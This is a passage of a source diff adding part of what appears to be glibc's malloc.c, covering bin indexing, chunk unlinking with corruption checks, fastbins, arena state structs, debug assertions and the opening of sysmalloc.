+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
+
+/* Take a chunk off a bin list.  */
+static void
+unlink_chunk (mstate av, mchunkptr p)
+{
+  if (chunksize (p) != prev_size (next_chunk (p)))
+    malloc_printerr ("corrupted size vs. prev_size");
+
+  mchunkptr fd = p->fd;
+  mchunkptr bk = p->bk;
+
+  if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
+    malloc_printerr ("corrupted double-linked list");
+
+  fd->bk = bk;
+  bk->fd = fd;
+  if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL)
+    {
+      if (p->fd_nextsize->bk_nextsize != p
+	  || p->bk_nextsize->fd_nextsize != p)
+	malloc_printerr ("corrupted double-linked list (not small)");
+
+      if (fd->fd_nextsize == NULL)
+	{
+	  if (p->fd_nextsize == p)
+	    fd->fd_nextsize = fd->bk_nextsize = fd;
+	  else
+	    {
+	      fd->fd_nextsize = p->fd_nextsize;
+	      fd->bk_nextsize = p->bk_nextsize;
+	      p->fd_nextsize->bk_nextsize = fd;
+	      p->bk_nextsize->fd_nextsize = fd;
+	    }
+	}
+      else
+	{
+	  p->fd_nextsize->bk_nextsize = p->bk_nextsize;
+	  p->bk_nextsize->fd_nextsize = p->fd_nextsize;
+	}
+    }
+}
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even if on 64bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks in the main arena.
+   Since do_check_malloc_state () checks this, we call malloc_consolidate ()
+   before changing max_fast.  Note other arenas will leak their fast bin
+   entries if max_fast is reduced.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+
+static inline INTERNAL_SIZE_T
+get_max_fast (void)
+{
+  /* Tell the GCC optimizers that global_max_fast is never larger
+     than MAX_FAST_SIZE.  This avoids out-of-bounds array accesses in
+     _int_malloc after constant propagation of the size parameter.
+     (The code never executes because malloc preserves the
+     global_max_fast invariant, but the optimizers may not recognize
+     this.)  */
+  if (global_max_fast > MAX_FAST_SIZE)
+    __builtin_unreachable ();
+  return global_max_fast;
+}
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+/*
+   have_fastchunks indicates that there are probably some fastbin chunks.
+   It is set true on entering a chunk into any fastbin, and cleared early in
+   malloc_consolidate.  The value is approximate since it may be set when there
+   are no fastbin chunks, or it may be clear even if there are fastbin chunks
+   available.  Given it's sole purpose is to reduce number of redundant calls to
+   malloc_consolidate, it does not affect correctness.  As a result we can safely
+   use relaxed atomic accesses.
+ */
+
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  __libc_lock_define (, mutex);
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Set if the fastbin chunks contain recently inserted free blocks.  */
+  /* Note this is a bool but not all targets support atomics on booleans.  */
+  int have_fastchunks;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  INTERNAL_SIZE_T max_mmapped_mem;
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+
+#if USE_TCACHE
+  /* Maximum number of buckets to use.  */
+  size_t tcache_bins;
+  size_t tcache_max_bytes;
+  /* Maximum number of chunks in each bucket.  */
+  size_t tcache_count;
+  /* Maximum number of chunks to remove from the unsorted list, which
+     aren't used to prefill the cache.  */
+  size_t tcache_unsorted_limit;
+#endif
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* These variables are used for undumping support.  Chunked are marked
+   as using mmap, but we leave them alone if they fall into this
+   range.  NB: The chunk size for these chunks only includes the
+   initial size field (of SIZE_SZ bytes), there is no trailing size
+   field (unlike with regular mmapped chunks).  */
+static mchunkptr dumped_main_arena_start; /* Inclusive.  */
+static mchunkptr dumped_main_arena_end;   /* Exclusive.  */
+
+/* True if the pointer falls into the dumped arena.  Use this after
+   chunk_is_mmapped indicates a chunk is mmapped.  */
+#define DUMPED_MAIN_ARENA_CHUNK(p) \
+  ((p) >= dumped_main_arena_start && (p) < dumped_main_arena_end)
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+#if USE_TCACHE
+  ,
+  .tcache_count = TCACHE_FILL_COUNT,
+  .tcache_bins = TCACHE_MAX_BINS,
+  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
+  .tcache_unsorted_limit = 0 /* No limit.  */
+#endif
+};
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called from ptmalloc_init () or from _int_new_arena ()
+   when creating a new arena.
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+#if HAVE_MALLOC_INIT_HOOK
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+compat_symbol (libc, __malloc_initialize_hook,
+	       __malloc_initialize_hook, GLIBC_2_0);
+#endif
+
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+/* This function is called from the arena shutdown hook, to free the
+   thread cache (if it exists).  */
+static void tcache_thread_shutdown (void);
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (prev_size (next_chunk (p)) == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_main_arena (p))
+        assert (av == &main_arena);
+      else
+        assert (av != &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* Check the arena is initialized. */
+  assert (av->top != 0);
+
+  /* No memory has been allocated yet, so doing more tests is not possible.  */
+  if (av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum) this does
+         only happen for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below, for glibc there is no
+         need for further alignments unless we have have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
